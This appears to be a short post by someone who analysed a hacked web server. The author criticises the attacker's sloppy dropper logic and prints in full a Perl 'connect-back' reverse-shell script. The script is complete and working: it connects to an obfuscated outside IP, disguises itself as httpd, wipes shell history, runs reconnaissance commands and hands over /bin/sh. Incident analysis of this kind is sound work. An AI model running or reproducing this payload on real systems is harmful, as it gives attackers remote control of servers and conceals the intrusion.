A hacker uploaded and attempted to execute this script on a web server I was asked to look at. (dc.txt was a reverse-shell Perl script). It wasn't until a little later I realised how horribly flawed this script is. Only the first system call attempts to copy the script to /tmp/dc.pl, the rest all try to use /tmp/dc.txt, which it then never tries to execute. So if system() is disabled in PHP, this hack will fail every time. Additionally, the only way this hack can work is if the hacker has already managed to upload his dc.txt script onto the server. Why does he bother copying it to /tmp? Contents of b.php --- Contents of dc.txt --- #!/usr/bin/perl use Socket; $perm="\x38\x32\x2e\x31\x36\x35\x2e\x31\x37\x37\x2e\x31\x33"; $port="\x38\x30\x38\x30"; $fake="/usr/sbin/httpd"; if ($ARGV[0]) { $perm=$ARGV[0]; } $proto = getprotobyname('tcp') || die("[x] Error: getprotobyname()\n\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[x] Error: Socket()\n"); if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($perm))) { die("[x] Dc Failed..\n"); } if (!fork( )) { $0=$fake."\0"x16;; open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); system("unset HISTFILE;unset HISTSIZE;unset HISTFILESIZE;HISTFILE=/dev/null;rm -rf /tmp/.bash_*"); system("echo [--] Uname ; uname -a ; echo [--] Uptime ; uptime ; echo [--] Id ; id ; echo --- ConnectBack ------------------------------------------------------------------------"); if ((-x "/usr/bin/wget") && (-e "/usr/bin/wget")) { system("echo wGet: Yes"); } if ((-x "/usr/bin/curl") && (-e "/usr/bin/curl")) { system("echo Curl: Yes"); } if ((-x "/usr/bin/fetch") && (-e "/usr/bin/fetch")) { system("echo Fetch: Yes"); } if ((-x "/usr/bin/GET") && (-e "/usr/bin/GET")) { system("echo GET: Yes"); } if ((-x "/usr/bin/lwp-download") && (-e "/usr/bin/lwp-download")) { system("echo LWP: Yes"); } if ((-x "/usr/bin/lynx") && (-e "/usr/bin/lynx")) { system("echo Lynx: Yes"); } exec {'/bin/sh'} $fake . "\0" x4; unlink($File); exit(0); } print "[x] Dc Connected. :-) \n";